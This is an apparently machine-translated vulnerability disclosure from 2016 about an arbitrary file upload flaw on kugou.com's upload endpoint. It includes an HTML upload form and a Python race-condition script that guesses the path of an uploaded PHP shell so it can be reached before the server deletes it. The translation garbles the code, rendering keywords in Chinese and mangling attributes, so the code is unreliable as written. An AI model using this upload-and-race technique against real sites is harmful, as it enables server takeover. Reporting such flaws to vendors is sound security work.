漏洞标题 酷狗主站的任意文件上传可以是shell 相关制造商 酷狗 漏洞作者 李长歌 提交时间 2016-05-15 10: 09 公共时间 2016-06-30 10: 00 漏洞类型 文件上载会导致任意代码执行 危险等级 高 自我评估等级 15 漏洞状态 制造商已确认 标签标签 未检查文件上传内容,文件上传漏洞,任意文件上传 漏洞详细信息 任何上传地址都是http://www.kugou.com/kf/kf/app/upload.php 保存html文件并上传 < HTML> <身体GT; < form action='http://www.kugou.com/kf/kf/app/upload.php'methodal-'post' MIME类型='的multipart/form-data的' > < label for='file'>文件名:</label> < input type='file'name='imgFile'id='imgFile'/> < br /> < input type='submit'name='submit'value='Submit'/> < /形式> < /体> </HTML> 获取路径{'错误': 0,'url':'。\/upload \ /1463241818.php'} 但我们无法通过访问http://找到该页面www.kugou.com/kf/kf/app/upload/1463241818.php
上传时刻已删除。 使用条件竞争,在删除之前生成shell,可以猜测上传后的路径 编写脚本以在上传php文件时同时猜测访问路径 导入urllib2 导入线程 进口时间 Def request_uri(): Uri='http://www.kugou.com/kf/kf/app/upload/%s.php'%str(time.time())。split('。')[0] 试试: Req=urllib2.Request(uri) Response=urllib2.urlopen(req).read() 打印'除%s'%uri 打印回复 除了例外,e: 通过 Def start(): 线程=[] 对于我在xrange(30): Threads.append(threading.Thread(目标=REQUEST_URI)) 对于线程:中的t T.start() 对于线程:中的t T.join() 如果__name __=='__ main__': 而真: 开始()
漏洞证明:
修理计划: Shell已被删除,修复 版权声明:请注明出处。李长歌@乌云